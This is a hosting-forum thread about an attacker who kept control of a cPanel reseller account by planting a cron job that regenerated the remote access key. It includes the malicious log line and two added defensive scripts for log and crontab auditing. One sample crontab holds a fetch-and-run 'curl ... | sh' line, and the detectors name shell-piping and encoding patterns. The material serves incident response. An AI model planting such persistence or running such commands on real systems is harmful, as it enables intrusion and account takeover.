cron to generate new remote access key
Hello,
This is a new one we've run into today.
We had a customer that was hacked; we are still unable to find out how initially, but their cPanel account is a reseller. They were sending remote API commands to change all passwords on the cPanel accounts under the reseller. We found out in the access logs that they were using the remote access key, so we cleaned up the accounts and generated a new hash key. A day later the same thing occurred. I just happened to be going through the access logs and noticed this:
206.190.158.75 - USER [09/22/2015:18:19:13 -0000] "GET /cpsess5668280899/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Cron&cpanel_jsonapi_func=add_line&minute=0&hour=0&day=1&month=*&weekday=*&command=php%20-q%20%2Fhome%2FUSER%2Ftmp%2Fcron.php&cache_fix=1442945927803 HTTP/1.1" 200 0 "https://server:2083/cpsess5668280899/frontend/x3/cron/index.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0" "-" "-"
Right away, I checked the crons for that user and saw:
0 0 1 * * php -q /home/USER/tmp/cron.php
Sure enough, clever little guy: pastebin.com/PvbQmmRn
I have yet to see this; I've been working heavily with cPanel for over 6 years and I'm not sure if this is something new, but I figured I would share this with everyone in case you are experiencing it, and maybe see if cPanel can implement some way to counter this. I'll be happy to share any other info, but hopefully this will help others who are pulling their hair out; my eyes are bleeding from going through thousands of lines of the cPanel access logs.
-Justin
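The tell in the post is a single cPanel API2 call (module Cron, function add_line) buried in thousands of access-log lines. The script below is an added example, not something from the thread or from cPanel: it parses lines in the format shown above, pulls the API module/function out of the query string, URL-decodes the cron command and schedule, and reports the calls that install or edit a cron entry. The log lines it runs on are constructed for the example (modelled on the one Justin posted, with a shortened User-Agent and two benign lines added); the WATCHED set is an assumption about which calls you want surfaced first, not a cPanel-defined list.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log text, modelled on the cPanel access-log line in the post.
# Line 1 is the malicious Cron::add_line call; lines 2 and 3 are benign noise.
SAMPLE_LOG = """\
206.190.158.75 - USER [09/22/2015:18:19:13 -0000] "GET /cpsess5668280899/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Cron&cpanel_jsonapi_func=add_line&minute=0&hour=0&day=1&month=*&weekday=*&command=php%20-q%20%2Fhome%2FUSER%2Ftmp%2Fcron.php&cache_fix=1442945927803 HTTP/1.1" 200 0 "https://server:2083/cpsess5668280899/frontend/x3/cron/index.html" "Mozilla/5.0" "-" "-"
203.0.113.7 - USER [09/22/2015:18:20:01 -0000] "GET /cpsess5668280899/frontend/x3/index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0" "-" "-"
203.0.113.7 - USER [09/22/2015:18:21:44 -0000] "GET /cpsess5668280899/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Cron&cpanel_jsonapi_func=listcron HTTP/1.1" 200 0 "-" "Mozilla/5.0" "-" "-"
"""

# ip - user [timestamp] "METHOD path PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# API2 calls worth reviewing after a compromise (assumed list; extend as needed).
WATCHED = {("Cron", "add_line"), ("Cron", "edit_line")}

def parse_line(line):
    """Split one access-log line into fields and decode its query string."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["path"])
    # parse_qs URL-decodes values, so %2Fhome%2F... comes back as /home/...
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec

def suspicious_api_calls(log_text):
    """Return the json-api calls in log_text that hit a WATCHED module/function."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or "/json-api/" not in rec["path"]:
            continue
        q = rec["query"]
        mod, func = q.get("cpanel_jsonapi_module"), q.get("cpanel_jsonapi_func")
        if (mod, func) not in WATCHED:
            continue
        schedule = " ".join(q.get(k, "?") for k in ("minute", "hour", "day", "month", "weekday"))
        hits.append({
            "ip": rec["ip"],
            "user": rec["user"],
            "time": rec["ts"],
            "api": f"{mod}::{func}",
            "schedule": schedule,
            "command": q.get("command", ""),
            "status": rec["status"],
        })
    return hits

if __name__ == "__main__":
    for h in suspicious_api_calls(SAMPLE_LOG):
        print(f'{h["time"]} {h["ip"]} {h["user"]} {h["api"]} [{h["schedule"]}] {h["command"]}')
```

Run it against the real file by reading it into `suspicious_api_calls` instead of `SAMPLE_LOG`; a 200 status on a Cron::add_line from an IP you do not recognise is the line to pivot on, and the decoded `command` tells you which file to pull for analysis.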
Hello :) Thank you for taking the time to share this with others on the forum. The best way to address this issue is to determine how the account is getting hacked and take steps to prevent it from happening again. Is there a specific feature you feel would be helpful when this happens? Thank you.
Well, it's your typical WP hack: outdated plugin, etc. I was merely pointing out the way they were able to keep generating a new hash with a PHP script. I don't personally know what, or if, something could be put into place to prevent that; I figured I would just share and let you guys with the brains decipher whether there is anything that can be done. If not, then at least others can be aware of the possibility.
Impressive hack to maintain access, thanks for sharing.
That's called eagle eye. Reading logs ain't a joke.
By default, resellers have privileges that allow them to set up a remote access key. One potential feature request you could open would be to include an option to limit the ability for resellers to set up remote access keys. That being said, in the meantime, for anyone that notices an account is hacked, it's always a good idea to review the cron jobs configured for an account after it's been hacked, in addition to any new files uploaded or changes made to existing files. Thank you.
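Reviewing a compromised account's cron jobs, as the reply above recommends, is easy to do by eye for one crontab and tedious for a reseller with dozens of sub-accounts. The following is an added example, not code from cPanel or from anyone in the thread: it parses crontab text in the per-user spool format, including `@reboot`-style entries, and flags the patterns that the entry in this thread and its usual cousins share (an interpreter run on a file under a tmp or cache directory, remote content piped into a shell, encoded or eval'd payloads). The sample crontab is constructed for the example; the heuristics are assumptions to tune, not a cPanel feature.

```python
import re
import shlex

# Constructed crontab text, as /var/spool/cron/USER might look after the
# compromise in the thread: one benign WordPress job plus two planted entries.
SAMPLE_CRONTAB = """\
MAILTO=""
# legitimate maintenance
*/15 * * * * /usr/local/bin/php /home/USER/public_html/wp-cron.php >/dev/null 2>&1
0 0 1 * * php -q /home/USER/tmp/cron.php
30 3 * * * /bin/sh -c "curl -s http://203.0.113.9/k.sh | sh"
"""

# Programs an attacker typically schedules (assumed list; extend as needed).
INTERPRETERS = {"php", "perl", "python", "python3", "sh", "bash", "curl", "wget", "base64"}
# Directories a web-shell drop or rekey script tends to live in.
SUSPECT_DIR_RE = re.compile(r"(^|\s|/)(tmp|\.cache|\.cagefs)/|/dev/shm/|/var/tmp/")
# "curl ... | sh", "wget -O- ... | bash", etc.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|perl|python[0-9.]*)\b")
ENCODED_RE = re.compile(r"\b(base64\s+(-d|--decode)|eval\()")

def parse_crontab(text):
    """Return the job entries in a crontab, skipping comments and VAR=value lines."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                    # @reboot, @daily, ...
            parts = line.split(None, 1)
            if len(parts) < 2:
                continue
            schedule, command = parts
        else:
            parts = line.split(None, 5)             # five time fields + command
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append({"line": lineno, "schedule": schedule, "command": command})
    return entries

def audit_crontab(text):
    """Return the entries that match at least one suspicious pattern, with reasons."""
    findings = []
    for entry in parse_crontab(text):
        cmd = entry["command"]
        try:
            argv = shlex.split(cmd)
        except ValueError:                           # unbalanced quotes: fall back
            argv = cmd.split()
        prog = argv[0].rsplit("/", 1)[-1] if argv else ""
        reasons = []
        if prog in INTERPRETERS and SUSPECT_DIR_RE.search(cmd):
            reasons.append("interpreter run on a file in a temp/cache directory")
        if PIPE_TO_SHELL_RE.search(cmd):
            reasons.append("remote content piped into a shell")
        if ENCODED_RE.search(cmd):
            reasons.append("encoded or eval'd payload")
        if reasons:
            findings.append({**entry, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f'line {f["line"]}: [{f["schedule"]}] {f["command"]}  <- {"; ".join(f["reasons"])}')
```

Feed it each file under the cron spool directory (or the output of `crontab -l -u USER`) and treat every finding as a file to retrieve before you delete the entry: the planted job is the persistence, but the script it runs is where the rekeying logic and any other credentials live.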